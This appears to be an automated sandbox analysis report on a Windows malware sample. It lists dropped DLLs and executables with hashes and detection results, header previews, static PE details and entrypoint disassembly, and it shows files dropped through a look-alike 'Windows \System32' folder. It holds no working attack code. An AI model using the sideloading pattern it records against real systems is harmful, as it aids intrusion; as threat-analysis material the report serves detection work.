                        SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....

                        C:\Windows\System32\libpq.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):327168
                        Entropy (8bit):6.055910692008984
                        Encrypted:false
                        SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                        MD5:EF060E5C414B7BE5875437FF2FB8EC54
                        SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                        SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                        SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................

                        C:\Windows\System32\libssl-3-x64.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):818176
                        Entropy (8bit):6.269258421632734
                        Encrypted:false
                        SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                        MD5:69D0FEE0CC47C3B255C317F08CE8D274
                        SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                        SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                        SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................

                        C:\Windows\System32\libwinpthread-1.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):52736
                        Entropy (8bit):5.840253326728635
                        Encrypted:false
                        SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                        MD5:9DC829C2C8962347BC9ADF891C51AC05
                        SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                        SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                        SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................

                        C:\Windows\System32\ucrtbased.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):1786880
                        Entropy (8bit):6.056894707447503
                        Encrypted:false
                        SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                        MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                        SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                        SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                        SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

                        C:\Windows\System32\usvcinsta64.exe

                        Download File
                        Process:C:\Users\user\Desktop\pyld64.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):14693888
                        Entropy (8bit):6.554170789313033
                        Encrypted:false
                        SSDEEP:393216:3PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:3ITkS6
                        MD5:11DDC0A34BAC7AB099D2EE8D9817BF58
                        SHA1:C9BD99F91118FCA4E1BFDEBC36CDED5B09BE39D0
                        SHA-256:0C396F737C1DECD395926CB52CC9F3D2AD1A3EEE5290DB62197CF617F2F0E554
                        SHA-512:62A0FF1412B3E28053FE2888D088C63B21BC07BD922C6286CAAF94FABAAC9FB5CABF91668CBEEE88E71B5B48F27613CBCCA63272A2AB604FCED69DA776567E49
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 58%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.L).F.,.L(...,.L/...,..I/...,..I(...,..I)..,.L-...,...-.}.,.H%...,.H....,.H....,.Rich..,.........................PE..d....C.f.........."....).(...".................@..........................................`.....................................................P....p.......0..<-..................`...8........................... ...@............@..`............................text....&.......(.................. ..`.rdata..>....@.......,..............@..@.data...h,..........................@....pdata..<-...0......................@..@.fptable.....`.......(..............@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................

                        C:\Windows\System32\vcruntime140d.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):131920
                        Entropy (8bit):6.0574531251583865
                        Encrypted:false
                        SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                        MD5:F57FB935A9A76E151229F547C2204BBA
                        SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                        SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                        SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................

                        C:\Windows\System32\winsvcf\winlogsvc

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):384
                        Entropy (8bit):7.449702240473978
                        Encrypted:false
                        SSDEEP:6:a1yzGK019rYhVXAsui2cxoOFO79eNtId8qXjo+4M8Oa14BwBRA20GG8sArNS0rwM:qm4BYhVXAst2cx7OxeM5Uww4BN/T8h0U
                        MD5:E4DBF14B398816BA31D6CF9A3467D7FE
                        SHA1:FCFE763F220BEC9100333F544362E8B32F17E6FF
                        SHA-256:6B7E165E5D28731F30D76CBD5397701E4C49E75D037D88EF1DE2467BE64296E1
                        SHA-512:170B9B0821931DF6C6060BE9F954F31301ED1C14A34093FD1F7B7DC7AE2D6CA22978D1F102B4FB1F1232CD2F5DCF90F6EA5E7CC221FF854B312615EFD6907604
                        Malicious:false
                        Preview:.....S.N....A....N...-.p...Hbx.Q...Q.=L.4#V.s...N..)...+c...._.;.j;....+.q....4.S..c.\.X.. .$.ba.t.*..x.-3..M..a..+.A...#.........Pq9..i..ET.B..A..PP...p-...Y,.9"./oc.|\.H&..<{..5..c^..K..#...../..'a.S....[.....hZ.........3....{.].\;a}.n...t...'.=_!.A.....?.=Kq....g.....S....F..N._...>..MZ.,3.R.R..Hv...Ie.x.c.G7'..4.{._...".....O.Ab+.iT.....1..l.$..*.7..PjP.. ....

                        C:\Windows\System32\x543664.dat

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):2256384
                        Entropy (8bit):6.5528122196655545
                        Encrypted:false
                        SSDEEP:24576:IIVkvsArhlpgxVnHkVnya+h0lhSMXlMDXg87/iXAah0lhSMXlDT/Z6Po7al9Nbtw:IMkkA1EHGnLag8TL3J6P7FGcjq
                        MD5:E4BD51C06CFF7A34FCCC4576AF852AFE
                        SHA1:D503AAFF2986C8F714D0FA457125BE566B6A9F95
                        SHA-256:FFAC21DD5AE0E22A1DC423361ECBFE5D73F2F11DB5A1F6906B03B2A0A2B6612C
                        SHA-512:5B2C69254F2EC25B2467983AE5C965F7860C4BDF8470E97594E6A0353CCC8E682B81815132FD38CE8B7F8F23FA013DA10C06C003C4B983A054651CC93A42324E
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 42%
                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}.%.9dK.9dK.9dK.I.N..dK.I.H.0dK.).O.6dK.,.J.;dK.I.O.!dK.).H.2dK.).N..dK.V.J.;dK.I.J.4dK.9dJ.3eK.q.B.(dK.q.K.8dK.q.8dK.q.I.8dK.Rich9dK.........................PE..d...!?.f.........." ...)............4........................................."...........`..........................................}!.P....}!......."...... ".<.............".l...0...8.......................(.......@............0...............................text...d........................... ..`.rdata..f`...0...b... ..............@..@.data...4}....!..J....!.............@....pdata..<.... ".......!.............@..@.fptable......"......R".............@....rsrc........."......T".............@..@.reloc..l....."......V".............@..B........................................................................................................................................................................

                        C:\Windows\System32\zlib1.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):90624
                        Entropy (8bit):6.511410074418791
                        Encrypted:false
                        SSDEEP:1536:EarCl5V5lEwda1RnSbFfbpYwayRyivl9bEKIOcIOZgyZ6rM3SIryPoIKr:EKcV5lEwUbShbpbaCpvsYSZgU6A3SIrf
                        MD5:BB78414FB31B53EF8FAD8AFBEDBB834C
                        SHA1:2CA62ED9A628E17887C0C9E5C07A2CC44B926EF8
                        SHA-256:AE8951AD96124A39B63610D7A5A53B446FC7F19151AC1D8E5AC15E8C88227EBF
                        SHA-512:9244CDF4EB86AE4071A74D584D170AC3D8F414F13EF3E9E8988C49B3488DC6FA1BB4DBB771635F145AE06484421C1101D120F63D34F3C479CD5F1FF9AAA646AF
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................[...a!....a!5...a!....a!....a!..............&....&....&7..._...&....Rich............................PE..d....,Of.........." ...(..................................................................`..........................................O......`W..........P....p..X...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...m.......n..................@..@.data........`.......L..............@....pdata..X....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................

                        C:\Windows\Temp\__PSScriptPolicyTest_44fvwntl.dvj.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_4el3tmf1.qc1.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_5wtfplpa.hbs.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_e5f35y5i.j5v.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_eeaqxq5x.fwj.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_qujsrayc.yes.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_rwn2e4la.etw.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_smx3rhl5.o3z.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_uhzxxdg2.vjx.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_wuld1u0t.xfo.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_y03xypri.s4c.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Windows\Temp\__PSScriptPolicyTest_yfv11nu1.h2y.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        Static File Info

                        General

                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                        Entropy (8bit):6.569534497252625
                        TrID:
                        • Win64 Executable GUI (202006/5) 92.65%
                        • Win64 Executable (generic) (12005/4) 5.51%
                        • Generic Win/DOS Executable (2004/3) 0.92%
                        • DOS Executable Generic (2002/1) 0.92%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Ld0f3NDosJ.exe
                        File size:440'832 bytes
                        MD5:00948444f3e248047722667419d54205
                        SHA1:ca291799966f2a1d8ec8cdab92daa6883bddac9e
                        SHA256:c97c029e6368bf6502e9c9c9ee0fc079c61da9e79c3798e8a246d19446b5afa8
                        SHA512:2c46a486fa26ed2c7da61309fd89acdee68c68d6b82f3f55f63c27d66737eba34a9ad4b7d62c27e8d4e40634ca9679ad13e1cb612ddfc3627c1b66657d7b4e3c
                        SSDEEP:6144:BQPNCRpJ2L+WVeE+KLKeR21lgp+A1ph0lhSMXlBXBWnd0oEsW5xW:TXaUgLTM1i+A1ph0lhSMXlid0oRoxW
                        TLSH:57949D1673E884F8E1A6C27888960A06E77378150751EBDF03ACD6762F636D15E3EF11
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............n\..n\..n\.xk]..n\.xj]..n\.xm]..n\.}m]..n\.}j]..n\.}k]..n\.xo]..n\..o\7.n\.|g]..n\.|.\..n\.|l]..n\Rich..n\...............

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x14001adb8
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x140000000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66C17707 [Sun Aug 18 04:22:31 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:033434673f6efe9e2891aa40ad6d0718

                        Entrypoint Preview

                        Instruction
                        dec eax
                        sub esp, 28h
                        call 00007F1270ED1268h
                        dec eax
                        add esp, 28h
                        jmp 00007F1270ED07AFh
                        int3
                        int3
                        dec eax
                        sub esp, 28h
                        dec ebp
                        mov eax, dword ptr [ecx+38h]
                        dec eax
                        mov ecx, edx
                        dec ecx
                        mov edx, ecx
                        call 00007F1270ED0942h
                        mov eax, 00000001h
                        dec eax
                        add esp, 28h
                        ret
                        int3
                        int3
                        int3
                        inc eax
                        push ebx
                        inc ebp
                        mov ebx, dword ptr [eax]
                        dec eax
                        mov ebx, edx
                        inc ecx
                        and ebx, FFFFFFF8h
                        dec esp
                        mov ecx, ecx
                        inc ecx
                        test byte ptr [eax], 00000004h
                        dec esp
                        mov edx, ecx
                        je 00007F1270ED0945h
                        inc ecx
                        mov eax, dword ptr [eax+08h]
                        dec ebp
                        arpl word ptr [eax+04h], dx
                        neg eax
                        dec esp
                        add edx, ecx
                        dec eax
                        arpl ax, cx
                        dec esp
                        and edx, ecx
                        dec ecx
                        arpl bx, ax
                        dec edx
                        mov edx, dword ptr [eax+edx]
                        dec eax
                        mov eax, dword ptr [ebx+10h]
                        mov ecx, dword ptr [eax+08h]
                        dec eax
                        mov eax, dword ptr [ebx+08h]
                        test byte ptr [ecx+eax+03h], 0000000Fh
                        je 00007F1270ED093Dh
                        movzx eax, byte ptr [ecx+eax+03h]
                        and eax, FFFFFFF0h
                        dec esp
                        add ecx, eax
                        dec esp
                        xor ecx, edx
                        dec ecx
                        mov ecx, ecx
                        pop ebx
                        jmp 00007F1270ED05AEh
                        int3
                        dec eax
                        mov dword ptr [esp+10h], ebx
                        dec eax
                        mov dword ptr [esp+18h], esi
                        push ebp
                        push edi
                        inc ecx
                        push esi
                        dec eax
                        mov ebp, esp
                        dec eax
                        sub esp, 10h
                        xor eax, eax
                        xor ecx, ecx
                        cpuid
                        inc esp
                        mov eax, ecx
                        inc esp
                        mov edx, edx
                        inc ecx
                        xor edx, 49656E69h
                        inc ecx
                        xor eax, 6C65746Eh
                        inc esp
                        mov ecx, ebx
                        inc esp
                        mov esi, eax
                        xor ecx, ecx

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x66e0c0x64.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6f0000x1e0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6b0000x2ea4.pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000x9d8.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x60f100x38.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
